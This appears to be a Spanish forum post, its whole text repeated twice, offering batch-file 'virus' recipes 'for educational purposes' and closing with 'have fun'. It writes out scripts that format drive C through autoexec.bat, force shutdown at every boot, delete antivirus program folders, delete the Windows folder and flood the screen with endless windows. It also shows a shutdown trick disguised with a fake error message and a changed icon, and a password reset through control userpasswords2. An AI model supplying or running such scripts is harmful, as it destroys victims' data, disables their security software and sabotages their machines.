hola!
aqui les adjunto un par de pasos para hacer "virus" (no se adaptan a la definicion real de virus)
y otras herramientas
informacion con fines educativos!!
1. CREAR UN VIRUS Q FORMATEA LA PC (Format.bat)
@echo off
cls
s | format c: -s -f -t 0 >>c:\autoexec.bat
2. CREAR UN VIRUS Q APAGUE LA PC APENAS LA ENCIENDE (shu***4ever.bat)
@echo off
echo shu*** -s -f -t 0 >>c:\autoexec.bat
cls
3. CREAR UN VIRUS Q BORRA VARIOS ANTIVIRUS DE LA PC
@echo off
cls
cd\
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Mcafee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
TODOS ESTOS HAY Q GUARDARL
4. ENTRAR A PC SIN LA CLAVE
loguearse con Administrador ,ingresa a un usuario en el
cmd poner <control userpasswords2> sin las <>, se selecciona
computer y se restablece la contraseña
5. VARIAS PANTALLAS SE ABREN ENTRE MAS START SE PONGAN
@echo off
:a
start
start
start
goto :a
6. Crear un virus q apague la pc
1.hacer un shorcut
click der NEW-shorcut
ENTER
2.poner esto en el .txt
shu*** -s -t 5 <---tiempo para apagarsela pc -c "Memoria Insuficiente o lo que se quiera"
ENTER
se guarda con la extension .bat y se le pone un nombre
ENTER
CAMBIARLE EL ICONO
para librarse del virus
cmd
shu*** -a
7. BORRA WINDOWS DE LA PC
@echo off
title g00d by3 window5
echo 4di05 a tu window5
del /s /f /q C:Windows
exit
NO LOS HE PROBADO TODOS PERO ALGUNOS ME HAN FUNCIONADO
DIVIERTANSE
aqui les adjunto un par de pasos para hacer "virus" (no se adaptan a la definicion real de virus)
y otras herramientas
informacion con fines educativos!!
1. CREAR UN VIRUS Q FORMATEA LA PC (Format.bat)
@echo off
cls
s | format c: -s -f -t 0 >>c:\autoexec.bat
2. CREAR UN VIRUS Q APAGUE LA PC APENAS LA ENCIENDE (shu***4ever.bat)
@echo off
echo shu*** -s -f -t 0 >>c:\autoexec.bat
cls
3. CREAR UN VIRUS Q BORRA VARIOS ANTIVIRUS DE LA PC
@echo off
cls
cd\
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Mcafee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
TODOS ESTOS HAY Q GUARDARL
4. ENTRAR A PC SIN LA CLAVE
loguearse con Administrador ,ingresa a un usuario en el
cmd poner <control userpasswords2> sin las <>, se selecciona
computer y se restablece la contraseña
5. VARIAS PANTALLAS SE ABREN ENTRE MAS START SE PONGAN
@echo off
:a
start
start
start
goto :a
6. Crear un virus q apague la pc
1.hacer un shorcut
click der NEW-shorcut
ENTER
2.poner esto en el .txt
shu*** -s -t 5 <---tiempo para apagarsela pc -c "Memoria Insuficiente o lo que se quiera"
ENTER
se guarda con la extension .bat y se le pone un nombre
ENTER
CAMBIARLE EL ICONO
para librarse del virus
cmd
shu*** -a
7. BORRA WINDOWS DE LA PC
@echo off
title g00d by3 window5
echo 4di05 a tu window5
del /s /f /q C:Windows
exit
NO LOS HE PROBADO TODOS PERO ALGUNOS ME HAN FUNCIONADO
DIVIERTANSE

